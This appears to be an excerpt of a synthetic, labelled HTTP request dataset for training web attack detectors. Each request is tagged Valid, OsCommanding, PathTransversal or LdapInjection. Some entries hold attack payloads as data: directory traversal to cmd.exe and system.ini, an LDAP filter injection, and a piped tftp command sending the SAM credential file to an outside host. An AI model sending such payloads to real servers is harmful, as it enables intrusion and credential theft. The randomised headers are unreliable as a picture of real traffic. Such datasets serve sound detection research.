GET /_vf8jYrj@QLlphtpass.bin?dgeu=%3FeruaNdwecsdNr&sIee=buD5cbh0dfg7wgD%3Fc&WILeqBgbt45=661&z2aoAii=8174746561&UUnetcatEe=cr+1a&Je1ubscAxnsc=yueItau6gC9oe&H9a7SnnnisElsla=etta7&aad=.%2F..%2F.%2F..%2F&1cy3shxeorntnf=ttu7e%3Faiets+&inwir=ie&5Smu=or+a&9elsplsTgoesb7=2726885&t8mxNnysmy=2yRt54mv_6N HTTP/1.1
Host: www.itate.fr:80
Connection: keep-alive
Accept: application/*;q=0.6
Accept-Charset: big5;q=0.8, x-mac-icelandic;q=0.1, utf-8;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: 2wsl9a-rixeoht;q=0.2
Cache-Control: no-store
Client-ip: 156.228.249.233
Cookie: HkncoTaynpt=Dphps;y7X3RxtermBm7QZ=5;iaceerNasovac=nodpsfnooe
Cookie2: $Version="10"
Date: Wed, 12 Jan 05 05:03:20 GMT
ETag: "s3X2xyY4nbloQUM2pt6"
Expect: ohfp
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Wed, 11 Aug 04 15:21:35 UTC
If-Unmodified-Since: Sat, 27 Dec 08 18:45:46 UTC
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: *
If-Range: Sat, 26 Dec 09 22:00:24 UTC
Max-Forwards: 8599
MIME-Version: 6.2
Pragma: tudElp1=sa6oeFe
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: Basic ZU5pcDpibmVzcA==
Range: 50635-77
Referer: http://www.eanteaoh.com/Tr8i/wianrakT/GoEe/epde.png
TE: deflate
Trailer: Accept-Encoding
User-Agent: erso/9.8.6.6
UA-CPU: StrongARM
UA-Disp: 714,744,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: 5.9 www.hhequr.tiff, 4.9 126.126.41.176, 7.1 www.ststy.tiff
Transfer-Encoding: deflate
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 627 www.luad.js "7atl" "Sun, 01 Jul 07 05:55:47 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44923
Start - Id: 12770
class: Valid
GET /hT2G6mF7dc/n@cMxrNBnhF/e5zsL/sg/d1LvIQG/hkKy28u6eZANbly/lfEy6cDr/enyeooeujldis/lapLoinnreSzeo/pC9yEnYnkP6Kz5/R36GuLf.jpeg?yua=qdga4A HTTP/1.1
Host: 215.178.240.46:80
Connection: t2osd
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 8Eot-tldrwkhi;q=0.8
Cache-Control: max-age=0328
Client-ip: 4.223.155.209
Cookie: owovh=0355015354
Cookie2: $Version="859"
Date: Sun, 13 Dec 09 23:55:33 CET
ETag: "VJl0IzjV_EBtGYqZ-TRf"
Expect: 100-continue
From: ahe6lcme@tscunoU.st
If-Modified-Since: Tue, 01 Sep 09 04:14:27 CET
If-Unmodified-Since: Sun, 28 Nov 04 09:02:07 CET
If-Match: "1ypVMml9w4fm@0qo"
If-None-Match: *
If-Range: "zcx07QO8FhZ_bJf1I3D1"
Max-Forwards: 38
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: eqxrte snsH=briit
Authorization: Basic aXRsbzplNjlhc2g=
Range: 23407-76
Referer: /nnwhe/2oanpc/ao1helss/eds6Ee/tosiwwiX.jpeg
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: hytsiecy (tW0B_m8xB)
UA-CPU: MIPS
UA-Disp: 508,842,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 386x735
Via: EwHh/7.7 8.79.135.118
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 131 201.134.124.106 "nmLen" 
X-Forwarded-For: 98.230.255.210
X-Serial-Number: 29101464435877036
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12770
Start - Id: 18090
class: Valid
GET /uEMC0kiL/e2QsEQ_/rAZqgY1YUGEZAol/ew7iaffajzoog/66VjrJO/laGUM3MkU/GPQ/rBc5tr.tiff?z7noenoNsoejm=iotHtpsock_stream&Tpwl07tt3c=t%28o&IOi=6oma&uplgjheIotn7f=su&acesnlfhlcp=vto86IetneolzeeDda&Ct=10880&K_id8if2OaBVQ=dHihsanbmNs8te4ui&pnOLhym=nulbnebeook HTTP/1.1
Host: www.vQerivTel.org
Connection: iokgpq
Accept: video/quicktime
Accept-Charset: windows-1257;q=0.8
Accept-Encoding: 
Accept-Language: laota-rats9s, a-fivtaI;q=0.0
Cache-Control: only-if-cached
Client-ip: 14.203.190.107
Cookie: m23rt3thti0t=9eAFTZ5P;edshoi=ese+nunion'eeAwindow.open
Cookie2: $Version="1"
Date: Mon, 19 Jun 06 19:15:00 UTC
ETag: W/"eHmW0mNcEda-3Z5u"
Expect: eprCieoo=fsdos
From: oecjtte@aJits.ch
If-Modified-Since: Sat, 28 Apr 07 01:32:56 CET
If-Unmodified-Since: Sun, 03 Jul 05 22:43:46 GMT
If-Match: "5SlIqQuoAHegeMC"
If-None-Match: *
If-Range: Fri, 19 Jan 07 14:15:39 UTC
Max-Forwards: 902
MIME-Version: 8.3
Pragma: i='lDK'
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: Basic amFtbUFsZGk6bW9uajV0Zw==
Range: -0327
Referer: /eusaui.swf
TE: gzip
Trailer: Accept-Encoding
User-Agent: virgytEsts/1.1.4
UA-CPU: MIPS
UA-Disp: 2004,7271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 022x8341
Via: ittvT/7.4 www.duih1sN.css
Transfer-Encoding: gzip
Upgrade: dad/1.8, foyho2/4.1
Warning: 504 www.jecaa.jpg "whtdsrErtaeai" "Sun, 11 Sep 05 02:40:23 GMT"
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 0963814403346136
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 18090
Start - Id: 11380
class: Valid
GET /ascar3lole/Aeurisnimemi4raein/tbm2T1U@/cZh/4dheenie8rfsnEScclea/s@/eisBo1Le80VCQy.mspx?h4hdQohc9ss=+b0reib%3Cahsc&agasnmireEw=e0pceqeXltei%3Ber&iielto=kB2IXMCjg&ebla1pa2uan2es=18&sitewYbi=e7%5Coi%28o&W5=hM2x%40p&kvt1ozne=%26anoqhdss%3An7ercp%29c%5Dko HTTP/1.0
Host: 170.237.206.142
Connection: niri
Accept: */*;q=0.7
Accept-Charset: windows-1252, x-mac-cyrillic;q=0.5, euc-tw, x-mac-icelandic
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 95.174.9.56
Cookie: k1kii=uenoe2s;fnuecneeviti=2781116514;inxp_6etc=2814918;Tmyeeenalr1e=ndHIc8MwCm
Cookie2: $Version="93"
Date: Mon, 19 Jan 09 19:17:21 GMT
ETag: "syky5MeP8AevCRukj4"
Expect: lzkec
From: rtjU2@qa9l.cz
If-Modified-Since: Thu, 26 Jan 06 03:34:25 CET
If-Unmodified-Since: Sat, 17 Mar 07 01:15:21 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 629
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM bnc2bzNrTndFZGE0aW94cm5zZk5nNGVhZWV0aHB0c2xyb29qb3lhMg==
Authorization: NTLM MG9hRXd5ZWx4b1NDa1EwaGlpZWVsbm13T05manNnbmVlbml2ejNraHpseHNybmc=
Range: 457-40
Referer: http://www.Aiecr.cz/rpeo/rmdAb4s/seil/lLefn/dkha.aspx
TE: deflate
Trailer: Upgrade
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 5.8; hv-ee; rv:3.5.1) Gecko/93591874
UA-CPU: Sparc
UA-Disp: 299,1774,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1359x6283
Via: 7.8 201.215.56.0:83, eDesa/5.9 www.tnaarl2.html, HTTP/2.6 www.t7be.tiff
Transfer-Encoding: compress
Upgrade: tarse/3.8
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 119.251.177.187
X-Serial-Number: 0505318
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11380
Start - Id: 44587
class: OsCommanding
GET /3GfdnpnCPVqL1_/Wvor9J/ysuORjgxiij31/ou2OErn0ltimsck/rhpyimw/EttHsttaifAhwm/myrtwAravmbtfnsrl/edTneEobnhtI/sdiire1aO4h/bvuI@oTifc-IFCtb/esrpegsms0mu5upaekel.sh?ri=Eos&sghwnSsriuseemr=60.128.30.240+++++%7C+++tftp+++++-i+++110.30.63.32+++PUT+sam._&S-k69=0336637&soagieyaatc=frVC-dx&evett2mfessa=h&0xPRHunionvIWXiwget=roem HTTP/1.1
Host: www.ihnno9eeOa.fr
Connection: close
Accept: video/mpeg, text/*, image/png
Accept-Charset: windows-1255, iso-8859-7, macintosh
Accept-Encoding: 
Accept-Language: 4irsbDO5-ea0euasd;q=0.3, ijH-rrhija, o1neuZr-sfdweie;q=0.1, e7edtthn-t, beop-s;q=0.7
Cache-Control: dnvhr=ireopmd
Client-ip: 2.90.133.61
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="82"
Date: Mon, 28 Dec 09 20:13:00 GMT
ETag: "w78aexpupN8g9SbMEjW"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Tue, 05 Feb 08 20:15:52 GMT
If-Unmodified-Since: Sat, 26 Dec 09 17:17:22 CET
If-Match: "Yie2GKq2vRnWQQs"
If-None-Match: "F21_4ypxpXPebo-2"
If-Range: "7XI-iDNXu5Ygiy-XYr7"
Max-Forwards: 3511
MIME-Version: 0.9
Pragma: qwu=t8e5
Proxy-Authorization: NTLM NnN3c3JsZWkxb2VpZ2NheDhydHRsZXRpaWwxbG9vY3pGZWlk
Authorization: NTLM c2UxZGx0bHRzZW9lcFphNzIzZGlTaWlvcmFwdGlkYXN1bG10aTBFdXNEdA==
Range: -2578
Referer: http://erCd7Tem.biz/dtIntSe/aOJo.nsf
TE: trailers,chunked;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 7.2; ra-no; rv:1.1.7) Gecko/75154140
UA-Color: color8
Via: HTTP/7.1 www.anelAe.jpeg, hguugm/0.1 www.twetRteu.png, HTTP/0.2 www.eryh.htm
Transfer-Encoding: deflate
Upgrade: stnat6/0.0
Warning: 109 www.oqshO.css "sekiw5f" 
X-Forwarded-For: 84.212.52.145
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44587
Start - Id: 20136
class: Valid
GET /ct/sMdBJJ0mnNq/uStfrteoirh/iwoehrsfasgxyate/zx7ysV1JJgimWNo9oy3Q/iSwHZK/6systemVcmdZnfmru/atyn/hcqzT7H6jvr/4saRtz/e7siR6aL_.exe?ahOmrsnoma2r=Y6idaoad-l&casm=sKUa-%40J_yn&hmmcexeOs027=i&gbody@MfEvizkSF=4530&w74wa43otiwaD=nt HTTP/1.0
Host: www.x10de.de
Connection: keep-alive
Accept: application/x-tar;q=0.4, application/zip, video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=87460
Client-ip: 236.231.158.107
Cookie: aeooemlaoti=s
Cookie2: $Version="078"
Date: Fri, 21 May 04 17:58:07 GMT
ETag: W/"SGv7307EF7jsWSZV"
Expect: 100-continue
From: np1ebr9@yntet.it
If-Modified-Since: Sun, 01 Apr 07 11:09:22 GMT
If-Unmodified-Since: Mon, 10 May 04 22:29:57 GMT
If-Match: *
If-None-Match: "TY0yLK1UxEUvRWY"
If-Range: Tue, 26 Sep 06 09:33:33 CET
Max-Forwards: 851
MIME-Version: 4.0
Pragma: o='os'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=cF2e12Eb
Range: 48910-875971,804755-62
Referer: /drjt.htm
TE: trailers,deflate
Trailer: Date
User-Agent: Mozilla/8.3 (X11; U; Open BSD i386 7.7; sm-ia; rv:0.5.0) Gecko/83098321
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2245x9664
Via: 0.3 95.0.46.223:627
Transfer-Encoding: compress
Upgrade: gsxSw/8.7, hxstE4/2.5, thn/2.2, tad/9.4, rii/8.9
Warning: 023 187.1.170.86 "oadsntlune149gNr" "Mon, 22 Nov 04 07:26:06 GMT"
X-Forwarded-For: 143.125.40.136
X-Serial-Number: 01250528765
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20136
Start - Id: 3780
class: Valid
GET /SE/T2XRov7yR/stcnp3vihns/amghtcjairi/stnVmi/nmckor0f28WK59/tful0Nlk8-Lpanmb6g6/iC2_/hr3fvz/h5niettLsfircw6ltqJ.dll?eu=awpuVC5DJ&ttweIpuzE=e8y1eeuni HTTP/1.1
Host: 251.71.97.236
Connection: keep-alive
Accept: application/*, application/*;q=0.4, application/rtf
Accept-Charset: windows-1250;q=0.7, iso-8859-2, iso-8859-8, iso-8859-8
Accept-Encoding: deflate, deflate;q=0.8, deflate;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 235.59.125.79
Cookie: 4iaig2iotdol=fX@;_icmdMsb=hrp oc:2h;boit8ihrA9t4t9n=2;uIczU2zbodytb=070168969;passwdov4sam=ruXyt
Cookie2: $Version="0"
Date: Sun, 09 May 04 07:08:49 GMT
ETag: W/"Cw5CBzPYBcAwz@Gj"
Expect: msle9rna=tnnrdc
From: ueatims@oatosfu.net
If-Modified-Since: Mon, 09 Feb 09 12:25:50 CET
If-Unmodified-Since: Sat, 10 Nov 07 23:28:52 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 30 Aug 08 04:30:19 UTC
Max-Forwards: 3
MIME-Version: 4.3
Pragma: Taeeen=ar
Proxy-Authorization: Basic Y3NuY2Rlb2o6b3lzNW0=
Authorization: Digest cnonce="ltztH"
Range: -60328,-3384,331-
Referer: http://www.oerem4id.gov/aT4aenoA/r5c6ba/rCtrt/n4in/aNrteec.wav
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 0.8; ml-ae; rv:7.3.4) Gecko/07178053
UA-CPU: PowerPC
UA-Disp: 599,9039,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0475x7705
Via: 8.6 7.92.49.237, 4.2 www.rtke.css
Transfer-Encoding: identity
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 034 234.86.11.26 "CauegTgiutt0" 
X-Forwarded-For: 17.86.119.104
X-Serial-Number: 68867877
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3780
Start - Id: 36551
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: www.3zejr.be
Connection: mEsaeiip
Accept: video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: shen-tnudln5;q=0.1, ohs4eew-s6, nnrdau-6Ia3ot, V-dx, nceeh-bdDm2ts
Cache-Control: max-age=16230
Client-ip: 131.100.188.215
Cookie: eaase3loilmrio=588;ttn=215;n6u=5rt3.7Sp1J;wxTcD=cks;VeesexgR=uneeperl O[Ic4m%t;or7y2otR=94
Cookie2: $Version="7"
Date: Sun, 29 Aug 04 23:55:06 UTC
ETag: "._sHr99T4AKY.QbUteoU"
Expect: 100-continue
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Tue, 13 Apr 10 10:59:01 UTC
If-Unmodified-Since: Fri, 04 Apr 08 05:43:01 CET
If-Match: "nAj6kUk7xKqAQ0qNL1"
If-None-Match: *
If-Range: Thu, 17 Aug 06 15:44:34 UTC
Max-Forwards: 26
MIME-Version: 5.7
Pragma: romm=ta
Proxy-Authorization: Digest nc=Ad95328B
Authorization: Basic b0VvUjl2YTpvcm9m
Range: -7292
Referer: http://www.bgOrittE.gov/Iai9tnc7/hWO4rrae/ntcihzl/nAtAe7er.pl
TE: trailers,trailers,chunked
Trailer: Warning
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 9.2; em-fb; rv:7.3.8) Gecko/30806330
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: 8.6 83.226.211.193, HTTP/4.5 253.69.13.41
Transfer-Encoding: compress
Upgrade: syjne/7.2
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36551
Start - Id: 45594
class: PathTransversal
GET /5XuRpV85t_EsG/nsiSydhfcmd/aPNyDvrspHs/wOErO/i-Ra9_SaWBu8Ajex1Q/eot9spomowtmjjtranR/c6eI--JFcHaW.t/TaPnHngilgft/aL4f/unionuyZ/drS8qeeuoEcQl29n.css?jrPHP2A29i_s=zemern7a&ttg9wnen56B8nev=nraegesnSooclrttn&6ZdY-=dhs2sh7oeht&rer=%5CWINNT%5Csystem.ini&acceptoTu9m=%28incoeapasswdi HTTP/1.0
Host: www.6er8elxt.st:422
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: dOao-xc5, enet-n;q=0.1, odole-0aeI, 1ttaa-eMe3n6, nee9aets-oe
Cache-Control: only-if-cached
Client-ip: 44.208.226.169
Cookie: oolx=ttorMxml ;aessbisoh4n=k
Cookie2: $Version="08"
Date: Sat, 26 Feb 05 08:39:03 UTC
ETag: W/"b3lipcZBuzQKnQD6by"
Expect: we9ro
From: f4re3ea2@HiNl.uk
If-Modified-Since: Mon, 25 Aug 08 12:09:23 CET
If-Unmodified-Since: Mon, 13 Mar 06 09:33:33 GMT
If-Match: *
If-None-Match: "MzcsACYnhVi0VBe"
If-Range: Wed, 26 Aug 09 16:36:37 GMT
Max-Forwards: 54
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest opaque="6glonc"
Range: -709
Referer: http://www.n6fC.fr/bsMdRii/Eghq7caa.html
TE: gzip;q=0.7,gzip,trailers
Trailer: Accept
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 0.7; ot-vy; rv:5.6.0) Gecko/21679040
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5892x3688
Via: frtav/9.5 www.gmlTv.css, FTP/4.2 243.202.97.221:0663
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 125.18.205.103
X-Serial-Number: 90033234881
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45594
Start - Id: 36450
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 21.98.208.167
Connection: 99ean
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: 5hOenna='te2J'
Client-ip: 144.216.33.215
Cookie: ia=301;a4ufrnykor=355;YoZ6B56W_dQJ=%kae
Cookie2: $Version="9"
Date: Sat, 29 Oct 05 19:54:51 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 04 Apr 04 18:58:46 UTC
If-Unmodified-Since: Sat, 10 Mar 07 01:11:37 GMT
If-Match: "YrTK_IhAwjNM-PDjj"
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: Tue, 09 Feb 10 04:22:36 CET
Max-Forwards: 0777
MIME-Version: 8.0
Pragma: CJWtnmP='wtgih'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM aGxldHBpdEFzdGN4YnN1dW5kY2thcHRNZUZmNmVlcnJpdDAwN2V0ZWYw
Range: 336-,5495-71936
Referer: http://www.isaa.org/cnhw/ile2/TxOtys/hemouony/Taxsanc.jpeg
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: esrj8x-P- http://www.9tihedl7.com
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 006x6469
Via: FTP/6.0 109.251.5.132, FTP/1.9 124.107.204.229
Transfer-Encoding: compress
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 29.240.171.31
X-Serial-Number: 8893219462168220047
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36450
Start - Id: 21648
class: Valid
GET /t9gofH/rFWzjpODL7E8oUV/d40/hi/eenb6hoj/tenwumeseerHdsh/e4lHL.sh?ri9tieaup6dldc=Ostunionrneunm&gfgroup byVulupositionk=062082&EV36ySEtY=jfQ&siiHlht5=eq%40ez1SfjX&faasrd=ehGqZ8y8&pEJmIsock_streamoNN=h%401 HTTP/1.0
Host: 18.144.55.241
Connection: IIbs
Accept: text/xml, application/rtf;q=0.9, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: s-0, hsaiueee-r2unoos;q=0.9, a-eioean2d;q=0.3, ui-oE;q=0.2
Cache-Control: no-cache
Client-ip: 211.84.162.129
Cookie: dtheaaukrlduhec=TuBtrtbeamx;grE=eeozellx;T4DLEoMnSF=bgter
Cookie2: $Version="9"
Date: Thu, 19 May 05 17:50:01 CET
ETag: W/"g-kp3mpGdOKD.w9SYxG"
Expect: 100-continue
From: ynfima@o2e6raaBs.org
If-Modified-Since: Mon, 02 Apr 07 13:46:12 GMT
If-Unmodified-Since: Sat, 26 Nov 05 03:13:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 320
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="mwtEreq"
Authorization: Digest response="5FE15b54EA67AC932c5F2Fbec5dcDDCe"
Range: -70672,783-,227-
Referer: http://www.dsibr.com/atpgAeL/ason98t.png
TE: trailers,trailers,gzip
Trailer: Host
User-Agent: Mozilla/0.0 (compatible; tShe; Solaris; re0z5I)
UA-CPU: PowerPC
UA-Disp: 4503,714,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 838x039
Via: 4.4 www.twri.png:9461
Transfer-Encoding: identity
Upgrade: asow/5.8, xtg/8.7, Dbta/5.2
Warning: 753 www.r8e8sd.jpeg "PRrTs4cebef6fdeoabnr" "Sun, 27 Mar 05 04:06:35 CET"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 1329095
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21648
Start - Id: 37196
class: LdapInjection
GET /trultswbeseskatcer/7KU8ULm/afpVZiDd6/tggElsrl8cuofqewe/ea3eEc/aiY8FZEL0K/Ne5ir7nrerulFhotm/mZ1HBv.exe?stylevbscriptuzopositionB=15595931&pySmdd5ryQ=ihlgM&bruooiadneg=eyxp_processing-instructione&kxUoQwinclude=%29++++%28+%7C++%28displayName%3Dhad*%29%28name+%3D+had*+%29%28+mail%3Dhad*++%29&oE8tiefinpi8eu=53101&sbeeonangc=sposso+e1Ci&xcsock_streamJOxAM_xX=rnZ%40y%40&bUOKG=ld%7C HTTP/1.1
Host: 122.232.134.215:4094
Connection: w42sDEuS
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 84.35.231.178
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="8"
Date: Tue, 12 Dec 06 15:17:59 UTC
ETag: W/"LXhwT0.d956fmuvI"
Expect: 100-continue
From: ssnh@aamhzelr.net
If-Modified-Since: Wed, 10 Sep 08 22:05:50 CET
If-Unmodified-Since: Wed, 08 Feb 06 12:50:40 CET
If-Match: "QHkl6BtaIA.9A8Naa9Y"
If-None-Match: *
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 8
MIME-Version: 2.5
Pragma: 1xi=hu3Rh
Authorization: NTLM ZGxibnV5M2phb29QZWE0aGE5MkF2ZXRpMjNteWEyb3RtZ21l
Range: 605-286224
Referer: http://www.iNit.fr/eharedt/nelSrr/ncwif9s/At0ou/drent.bin
TE: trailers,chunked,chunked
Trailer: From
User-Agent: Mozilla/8.6 (X11; U; Linux i586 2.9; od-si; rv:8.7.3) Gecko/49095806
UA-CPU: Sparc
UA-OS: Win98
UA-Color: color8
Via: HTTP/6.6 www.oloaHcs.tiff, PLd/7.8 187.63.62.215
Transfer-Encoding: daem
Upgrade: resPct/8.2
Warning: 210 www.aenolsu.gif "shzStqziheorenrrf" 
X-Forwarded-For: 209.47.70.154
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37196
Start - Id: 45547
class: PathTransversal
GET /Ehteotmnfe/Rg/WsEeiw/EtSAxiFNC_hc/wdsnAzTNQXzKf3fokHF.shtml?e8=nssh&msebuT=Eddaieyrn1ostn&ew=00432&eity=s+ae&eeltlay=38032&spyeref8eTdjo=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&httpsN1P.@Tr=ghhc7 HTTP/1.1
Host: www.ysqllRes.be:80
Connection: liOtdf5o
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: 88stDmrE-n
Cache-Control: min-fresh=35
Client-ip: 15.78.136.11
Cookie: hzrArkq=a q;Ihnsiln=7324;tDteebs2=kf@Ch2bew
Cookie2: $Version="4"
Date: Mon, 29 Sep 08 11:17:13 GMT
ETag: W/"PFUNEE-2p-Js2P9AZMS"
Expect: urperzok
From: hwpha@Suan.org
If-Modified-Since: Sat, 06 Aug 05 09:55:35 UTC
If-Unmodified-Since: Mon, 21 May 07 11:05:12 UTC
If-Match: *
If-None-Match: *
If-Range: "lWBJ6HA4ya@N0Lt"
Max-Forwards: 73
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: NTLM dmFzZm1ua29vT3NjZW5mZHd0ZXJ0YWFzOERsdWlKZVR1Z2NuY3JrbzBy
Range: 903-3,3-4324,-8
Referer: http://vasgpxer.de/nlereee/Btwl4nac.gz
TE: trailers,chunked,deflate;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.8 (Windows; U; Windows NT 8.6; mo-eI; rv:2.3.9) Gecko/77941054
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 220x9820
Via: HTTP/9.2 86.2.124.28:29375
Transfer-Encoding: compress
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45547
Start - Id: 30591
class: Valid
GET /3yleyldqeuhec/lIdXn8VpE7YV1GgwF/qGAuIY1.asmx?ltlE=amalo6iotueahihB&pIaMakdt3=Exdl%28positionL%7CNev2wr+iiln&nru5ctbq=7870967451&Uhiddhprn=eRmwmGa.Kuv&essthtruPettx=mno1ceSirlreaegt&htetlhoataow3re=9&lbtEmrcshms=8019&EoweteunyGw=1YeB31iL&MS7open0dn7X=nIyaVebk&noroebee3s7a2ee=838&Unc3rs2ioXJo4w=hFr&QncAJHncrPzRlink=hjti2N&qhnirpsanw=7353290 HTTP/1.1
Host: www.caeuhegh4r.it
Connection: atsdatg
Accept: image/jpeg
Accept-Charset: cp-950, euc-tw, x-mac-greek;q=0.2, koi8-r;q=0.1, x-mac-hebrew
Accept-Encoding: 
Accept-Language: ewuiswEe-ftelqhdo
Cache-Control: min-fresh=36
Client-ip: 235.52.181.158
Cookie: En=T%thaYa0alsfjtvn3syae;etZd5ea=0520031;eesr=0a?cyr1r;wruuhcNac=qysayv
Cookie2: $Version="001"
Date: Sat, 01 Dec 07 07:09:40 UTC
ETag: "gg1X-8UhAWyIZ5KCUz_-"
Expect: 100-continue
From: cehhmBuy@esgh9bl.de
If-Modified-Since: Wed, 02 Jan 08 15:25:16 GMT
If-Unmodified-Since: Fri, 29 Feb 08 16:51:26 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Jan 04 14:56:48 GMT
Max-Forwards: 063
MIME-Version: 9.2
Pragma: sfn5fh=eiodoEda
Proxy-Authorization: dlri frtoat=ifoee5n
